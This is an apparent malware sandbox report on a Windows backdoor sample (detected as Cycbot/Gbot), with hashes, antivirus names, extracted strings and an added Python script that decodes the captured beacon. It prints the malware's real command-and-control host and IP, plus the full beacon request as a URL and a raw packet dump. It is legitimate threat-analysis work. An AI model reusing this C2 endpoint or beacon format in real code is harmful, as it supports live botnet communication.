Analysis Date: 2015-01-26 13:08:00
MD5: 5c6ef5d95e4eb0d3bd3b5403e5f49d20
SHA1: a20fdd3916651fbfeac1f36fa510537cf9462da9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 1de2bb20c3e222ae1b013ab99bdfbcec sha1: e84361dd027c9345f5e198396970a1707640a147 size: 69120
Section .rdata md5: 1da35566a87783f52a6cc4a57b2c5f9d sha1: 4adbcf1fed5b1e58bf1b0357d514ff76aab4e0df size: 2048
Section .data  md5: e684f718ae615618f83138fabfc85748 sha1: 2263d7eb56935eeeef3b4924bc9a3956e59a803d size: 8192
Section .crt   md5: 75fec42dcaa9f09e0205e6cc93e2397e sha1: d13187a33261d8366bf477d880e3c243f2d7c3e4 size: 512
Timestamp: 2005-09-12 22:06:06
PEhash: 9e3f1ae5e9cc74b49f96bec712f8b128bb064fef
IMPhash: 31b78e79eeca0e7e3e00aa7fda822b2f
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.2847
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Gen:Variant.Kazy.2847
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Variant.Kazy.2847
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-8177
AV Dr. Web: Trojan.Fakealert.20170
AV Emsisoft: Gen:Variant.Kazy.2847
AV Eset (nod32): Win32/Kryptik.KFV
AV Fortinet: W32/FakeAV.DO!tr.bdr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.2847
AV Grisoft (avg): Win32/Heur
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Trojan ( 0020d5ad1 )
AV Kaspersky: Backdoor.Win32.Gbot.dkj
AV MalwareBytes: no_virus
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.C
AV MicroWorld (escan): Gen:Variant.Kazy.2847
AV Rising: Trojan.Win32.Generic.127B36E7
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Error Scanning File

Runtime Details:

Process
↳ C:\malware.exe

Creates File: \Device\Afd\Endpoint (the Winsock AFD endpoint; opened when the process creates a socket)

Network Details:

DNS: zonetf.com
Type: A
141.8.225.80
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz6jpJvvYvZqCai4gP4q4W8%2Bv6KYvnCHaV%2FjjsW%2BdYFuTOH70awEqjUW9PnC8iPhbz6Q%2Fs2rc%2FNoSuX4sKxzgho55v6w3mL2agmlqoDuNOFvPryqnfVSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows: TCP 192.168.1.1:1031 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 366a704a 76765976   BN6yLhbz6jpJvvYv
0x00000030 (00048)   5a714361 69346750 34713457 38253242   ZqCai4gP4q4W8%2B
0x00000040 (00064)   76364b59 766e4348 61562532 466a6a73   v6KYvnCHaV%2Fjjs
0x00000050 (00080)   57253242 64594675 544f4837 30617745   W%2BdYFuTOH70awE
0x00000060 (00096)   716a5557 39506e43 38695068 627a3651   qjUW9PnC8iPhbz6Q
0x00000070 (00112)   25324673 32726325 32464e6f 53755834   %2Fs2rc%2FNoSuX4
0x00000080 (00128)   734b787a 67686f35 35763677 336d4c32   sKxzgho55v6w3mL2
0x00000090 (00144)   61676d6c 716f4475 4e4f4676 50727971   agmlqoDuNOFvPryq
0x000000a0 (00160)   6e665653 72253246 65253242 56355a75   nfVSr%2Fe%2BV5Zu
0x000000b0 (00176)   52672533 44253344 20485454 502f312e   Rg%3D%3D HTTP/1.
0x000000c0 (00192)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000d0 (00208)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000e0 (00224)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000f0 (00240)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000100 (00256)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000110 (00272)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000120 (00288)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000130 (00304)   6f6e3a20 636c6f73 650d0a0d 0a         on: close....
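The beacon captured above is a single POST with an empty body (Content-Length: 0); the only data it carries is the tq= query parameter, a URL-encoded base64 string (note the %2B, %2F and %3D escapes for +, / and =). The Python below is an added worked example, not part of the sandbox report: it parses the Raw Pcap hex dump back into bytes, checks the offsets, splits the HTTP request, and decodes tq down to raw bytes. The dump text is copied from the report; the function names are my own, and the report does not say how the decoded blob is encoded beyond base64, so the example stops at the bytes.

```python
"""Rebuild the C2 beacon from the report's Raw Pcap hex dump and pull apart
the tq= parameter. Added example; not part of the sandbox report."""
import base64
import re
from urllib.parse import unquote, urlsplit

# Hex dump copied from the "Raw Pcap" section of the report.
RAW_PCAP = """\
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 366a704a 76765976   BN6yLhbz6jpJvvYv
0x00000030 (00048)   5a714361 69346750 34713457 38253242   ZqCai4gP4q4W8%2B
0x00000040 (00064)   76364b59 766e4348 61562532 466a6a73   v6KYvnCHaV%2Fjjs
0x00000050 (00080)   57253242 64594675 544f4837 30617745   W%2BdYFuTOH70awE
0x00000060 (00096)   716a5557 39506e43 38695068 627a3651   qjUW9PnC8iPhbz6Q
0x00000070 (00112)   25324673 32726325 32464e6f 53755834   %2Fs2rc%2FNoSuX4
0x00000080 (00128)   734b787a 67686f35 35763677 336d4c32   sKxzgho55v6w3mL2
0x00000090 (00144)   61676d6c 716f4475 4e4f4676 50727971   agmlqoDuNOFvPryq
0x000000a0 (00160)   6e665653 72253246 65253242 56355a75   nfVSr%2Fe%2BV5Zu
0x000000b0 (00176)   52672533 44253344 20485454 502f312e   Rg%3D%3D HTTP/1.
0x000000c0 (00192)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000d0 (00208)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000e0 (00224)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000f0 (00240)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000100 (00256)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000110 (00272)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000120 (00288)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000130 (00304)   6f6e3a20 636c6f73 650d0a0d 0a         on: close....
"""

# One dump line: 0x<hex offset> (<decimal offset>)   <hex groups padded to 35 columns>   <ascii>
LINE_RE = re.compile(r"^0x([0-9a-fA-F]{8}) \((\d+)\) {3}(.{1,35})")


def hexdump_to_bytes(dump: str) -> bytes:
    """Parse the dump format back into the raw TCP payload.

    Only the hex column is used; the ASCII column is lossy (non-printables
    show as '.'). Both offsets are checked against the running byte count so
    a dropped or duplicated line raises instead of silently shifting data.
    """
    out = bytearray()
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or non-dump line
        hex_off, dec_off, hexfield = int(m.group(1), 16), int(m.group(2)), m.group(3)
        if hex_off != dec_off or hex_off != len(out):
            raise ValueError(f"offset mismatch: line says {hex_off}, have {len(out)} bytes")
        out += bytes.fromhex(hexfield.replace(" ", ""))
    return bytes(out)


def parse_http_request(payload: bytes):
    """Split a raw HTTP/1.x request into (method, target, version, headers, body)."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers, body


def extract_tq(target: str) -> bytes:
    """URL-decode the tq= value and base64-decode it.

    Deliberately unquote(), not unquote_plus()/parse_qs(): the base64
    alphabet contains '+', and the form rule '+' -> ' ' would corrupt the
    blob if a client ever sent it unescaped.
    """
    query = urlsplit(target).query
    params = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
    return base64.b64decode(unquote(params["tq"]), validate=True)


def analyse_beacon(dump: str = RAW_PCAP) -> dict:
    """Summarise the beacon: request shape, headers, and what tq= decodes to."""
    payload = hexdump_to_bytes(dump)
    method, target, version, headers, body = parse_http_request(payload)
    blob = extract_tq(target)
    declared_len = int(headers.get("content-length", "-1"))
    return {
        "payload_len": len(payload),
        "method": method,
        "version": version,
        "path": urlsplit(target).path,
        "host": headers.get("host"),
        "user_agent": headers.get("user-agent"),
        "content_length_ok": declared_len == len(body),
        "tq_decoded_len": len(blob),
        "tq_head": blob[:3].hex(),
        # share of bytes in the printable ASCII range; low means not plain text
        "tq_printable_ratio": sum(32 <= b < 127 for b in blob) / len(blob),
    }


if __name__ == "__main__":
    for k, v in analyse_beacon().items():
        print(f"{k}: {v}")
```

The offset check is what makes the hex-dump parser worth having: sandbox exports are hand-copied often enough that a missing line is a realistic failure, and the request would still parse "successfully" with the tq value silently shortened. The decoded tq blob is 106 bytes and starts with 0x80, so it is not an ASCII string; whatever encoding the bot applies before base64 is not described in this report.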


Strings
...
040904b0
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
4*f*wZ
]^]7c6
**/[*a
ClearCommError
CloseHandle
CreateFileA
CreateStdAccessibleObject
@.data
DeleteCriticalSection
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
@f^t+c[V
g7W5ES`	
GetAncestor
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
hhlFre
hhLibr
H!r#:V
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
j}]:9c
JRi;@U
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LresultFromObject
l*)X:uQ
MessageBoxW
MultiByteToWideChar
n|2	z=
OLEACC.dll
Oxg$%R
*:,=*p
qO'Jtg
RaiseException
`.rdata
ReadFile
RPCRT4.dll
RtlUnwind
SEqo9W
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
Sz=f],0
TerminateProcess
!This program cannot be run in DOS mode.
*t^o*:
UnhandledExceptionFilter
UNs3NZ
USER32.dll
UuidCreate
VH*o!7m"
}}w*/3
w4zP*J
WideCharToMultiByte
w*:}L`
WriteConsoleA
WriteConsoleW
WriteFile
}Xt5HKH
yhAGs:
z*}V)N